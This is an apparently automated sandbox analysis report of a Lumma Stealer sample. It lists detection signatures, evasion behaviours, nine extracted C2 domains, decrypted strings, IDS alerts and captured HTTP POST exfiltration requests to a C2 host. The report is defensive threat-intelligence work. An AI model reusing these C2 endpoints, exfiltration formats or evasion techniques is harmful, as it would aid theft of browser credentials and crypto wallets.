
Windows Analysis Report
wf1Ps82LYF.exe

Overview

General Information

Sample name: wf1Ps82LYF.exe (renamed because original name is a hash value)
Original sample name: 9b88afc4511d0fe8aca6080d34f2dd66.exe
Analysis ID: 1576242
MD5: 9b88afc4511d0fe8aca6080d34f2dd66
SHA1: 4d0abcc2f053e2b17d3064f65dffc171f873b043
SHA256: 5d2b5f0d8b9fbfb231b99678bb332bee9cfef9aa6c2ed7e994dbabbb83639004
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • wf1Ps82LYF.exe (PID: 7588 cmdline: "C:\Users\user\Desktop\wf1Ps82LYF.exe" MD5: 9B88AFC4511D0FE8ACA6080D34F2DD66)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["awake-weaves.cyou", "debonairnukk.xyz", "effecterectz.xyz", "wrathful-jammy.cyou", "diffuculttan.xyz", "tacitglibbr.biz", "deafeninggeh.biz", "sordid-snaked.cyou", "immureprech.biz"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.1540480401.0000000001068000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1540788781.0000000001068000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: wf1Ps82LYF.exe PID: 7588 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: wf1Ps82LYF.exe PID: 7588 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: wf1Ps82LYF.exe PID: 7588 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-16T17:15:00.530872+0100 | 2058230 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 59301 | 1.1.1.1 | 53 | UDP
2024-12-16T17:15:02.013493+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:02.013493+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49706 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:02.821315+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:02.821315+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:04.115519+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:04.115519+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49707 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:04.875796+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:04.875796+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:06.573219+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49708 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:06.573219+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49708 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:07.438616+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49708 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:08.827724+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49709 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:08.827724+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49709 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:11.598593+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49710 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:11.598593+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49710 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:14.243882+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49711 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:14.243882+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49711 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:16.747072+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49712 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:16.747072+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49712 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:20.493181+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 104.21.50.161 | 443 | TCP
2024-12-16T17:15:20.493181+0100 | 2058231 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49715 | 104.21.50.161 | 443 | TCP


                AV Detection

Source: wf1Ps82LYF.exe | Avira: detected
Source: https://tacitglibbr.biz/jLI | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz:443/apiDQ | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/sZ7 | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz:443/apil | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/apizT | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz:443/apin.txtPK | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/d | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/M | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/pil | Avira URL Cloud: Label: malware
Source: https://tacitglibbr.biz/apill | Avira URL Cloud: Label: malware
Source: wf1Ps82LYF.exe.7588.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["awake-weaves.cyou", "debonairnukk.xyz", "effecterectz.xyz", "wrathful-jammy.cyou", "diffuculttan.xyz", "tacitglibbr.biz", "deafeninggeh.biz", "sordid-snaked.cyou", "immureprech.biz"], "Build id": "PsFKDg--pablo"}
Source: wf1Ps82LYF.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: wf1Ps82LYF.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: awake-weaves.cyou
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: wrathful-jammy.cyou
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: debonairnukk.xyz
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: diffuculttan.xyz
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: effecterectz.xyz
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: deafeninggeh.biz
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: immureprech.biz
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: tacitglibbr.biz
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: PsFKDg--pablo
Source: wf1Ps82LYF.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Directory queried: number of queries: 1001

                Networking

Source: Network traffic | Suricata IDS: 2058230 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz) : 192.168.2.8:59301 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49708 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49707 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49709 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49706 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49710 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49715 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49712 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49711 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49707 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49708 -> 104.21.50.161:443
Source: Malware configuration extractor | URLs: awake-weaves.cyou
Source: Malware configuration extractor | URLs: debonairnukk.xyz
Source: Malware configuration extractor | URLs: effecterectz.xyz
Source: Malware configuration extractor | URLs: wrathful-jammy.cyou
Source: Malware configuration extractor | URLs: diffuculttan.xyz
Source: Malware configuration extractor | URLs: tacitglibbr.biz
Source: Malware configuration extractor | URLs: deafeninggeh.biz
Source: Malware configuration extractor | URLs: sordid-snaked.cyou
Source: Malware configuration extractor | URLs: immureprech.biz
Source: Joe Sandbox View | IP Address: 104.21.50.161 104.21.50.161
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 104.21.50.161:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.50.161:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: tacitglibbr.biz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: tacitglibbr.biz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=EF839D2LLWKORXY5BO
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12846
    Host: tacitglibbr.biz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=2MMU31FEZ74B
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15039
    Host: tacitglibbr.biz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=140DF29UV4GHED
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20218
    Host: tacitglibbr.biz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=AIDRU3R1C98DTLM9H35
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1249
    Host: tacitglibbr.biz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=0EHZDQXPSN9Y7DE
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 587708
    Host: tacitglibbr.biz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: tacitglibbr.biz
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: tacitglibbr.biz
Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: wf1Ps82LYF.exe, 00000000.00000002.1620621391.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540730534.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1512232664.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1536299453.0000000005A73000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578306795.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618128391.00000000010E3000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz/
Source: wf1Ps82LYF.exe, 00000000.00000003.1536686995.0000000005A73000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1536997543.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540730534.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1536299453.0000000005A73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz/M
Source: wf1Ps82LYF.exe, wf1Ps82LYF.exe, 00000000.00000003.1615801963.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1616158782.000000000106A000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578681212.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578765912.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618128391.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618045816.000000000106C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz/api
Source: wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz/apill
Source: wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1616158782.000000000106A000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618045816.000000000106C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz/apizT
Source: wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz/d
Source: wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz/jLI
Source: wf1Ps82LYF.exe, 00000000.00000003.1578681212.00000000010E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz/pi
Source: wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz/pil
Source: wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz/sZ7
Source: wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz:443/api
Source: wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz:443/apiDQ
Source: wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578765912.0000000001052000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tacitglibbr.biz:443/apil
